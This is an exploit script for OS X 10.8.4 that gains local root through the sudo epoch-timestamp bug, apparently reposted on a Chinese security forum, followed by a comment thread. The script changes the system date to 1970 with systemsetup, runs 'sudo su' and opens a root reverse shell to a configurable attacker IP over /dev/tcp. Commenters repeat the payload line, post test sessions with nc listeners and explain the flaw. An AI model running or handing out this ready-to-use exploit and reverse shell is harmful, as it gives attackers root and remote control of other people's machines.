#!/usr/bin/python
# Original MSF Module:
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb
###################################################################################################
# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
# Date: 08-27-2013
# Exploit Author: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
# Tested On: OSX 10.8.4
#
# Reference: http://www.exploit-db.com/exploits/27944/
#
# Example below:
# trustedsec:Desktop Dave$ python osx_esc.py
# [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444
#
# attacker_box:~ Dave$ nc -l 4444
# bash: no job control in this shell
# bash-3.2#
###################################################################################################
import subprocess
# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"
# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"
# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))
print """
###############################################################
#
# OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell
#
# Written by: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
#
# Reference: http://www.exploit-db.com/exploits/27944/
###############################################################
"""
print "[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr,port)
相关讨论:
1#
xsjswt | 2013-09-03 13:31
@xsser 为什么不发exploit那个领域
2#
xsjswt | 2013-09-03 13:32
systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &
3#
xsjswt | 2013-09-03 13:33
就这句就够了吧
4#
xsjswt | 2013-09-03 13:33
还有个2>&1,不然很多错误信息看不到
5#
xsser (十根阳具有长短!!) | 2013-09-03 13:38
ls -al /usr/sbin/systemsetup -rwxr-xr-x 1 root wheel 249360 7 8 2011 /usr/sbin/systemsetup
这个没有什么特别啊 为什么能够root呢
6#
123 (v2ex) | 2013-09-03 13:54
systemsetup是系统配置工具,但是这个需要admin权限才能运行,只是说绕过root密码执行操作
7#
xsser (十根阳具有长短!!) | 2013-09-03 14:04
@123 你没有回答问题啊 /usr/sbin/systemsetup 这个怎么会有root权限
8#感谢(1)
疯狗 (谁淫荡啊谁淫荡) | 2013-09-03 14:17
@xsjswt @123 @xsser
FengGou:Desktop $ ./root.py [*] Exploit has been performed. You should have a shell on ipaddr: 192.168.1.113 and port 8888 FengGou:~ $ nc -vvl 8888 bash: no job control in this shell bash-3.2#
FengGou:Desktop $ sudo -k FengGou:Desktop $ ./root.py [*] Exploit has been performed. You should have a shell on ipaddr: 192.168.1.113 and port 8888 FengGou:Desktop $ Password: Password: Password: FengGou:~ $ nc -vvl 8888 bash: no job control in this shell bash-3.2$
如果没猜错的话,这个exp是有个前提的,就是你最近sudo过,生成过用户认证时间戳文件,而且还在有效期内。
不关systemsetup的事,是sudo bin的漏洞。
PS:注意sudo -k
9#
疯狗 (谁淫荡啊谁淫荡) | 2013-09-03 14:22
k参数的man如下:
-k When used by itself, the -k (kill) option to sudo invalidates the
user's time stamp by setting the time on it to the Epoch. The next
time sudo is run a password will be required. This option does not
require a password and was added to allow a user to revoke sudo
permissions from a .logout file.
When used in conjunction with a command or an option that may require a
password, the -k option will cause sudo to ignore the user's time stamp
file. As a result, sudo will prompt for a password (if one is required
by sudoers) and will not update the user's time stamp file
更新时间错文件后,systemsetup将系统时间改成0,就是1970年第一天,触发这个sudo漏洞,我在看看CVE哈
10#
低调 | 2013-09-03 14:28
[b]厉害
11#
落叶纷飞 (im luoye,Once the 00day) | 2013-09-03 14:58
蛋疼。。。
12#
疯狗 (谁淫荡啊谁淫荡) | 2013-09-03 15:06
好了,找到官方公告了,一切尽在不言中
http://www.sudo.ws/sudo/alerts/epoch_ticket.html
13#
我勒个去 | 2013-09-03 15:13
@xsser 这是两个命令,BUG出在系统被设置为1970年这个时间,会导致sudo不要密码。
14#
xsjswt | 2013-09-03 16:20
@xsser @我勒个去 @疯狗 屌
15#
雨路 (迷你主机网- 免费PH空间www.mi-ni.ml) | 2013-09-03 16:25
上回日国外站的时候就遇到一台mac os的服务器
16#
Lenwood (\r) | 2013-09-03 17:14
@疯狗 @xsser 既然在有效期内,明明直接sudo su - 就root了,爱咋咋地。再用systemsetup不是多此一举。
17#
xsser (十根阳具有长短!!) | 2013-09-03 18:20
@Lenwood 用system破坏这个有效期的机制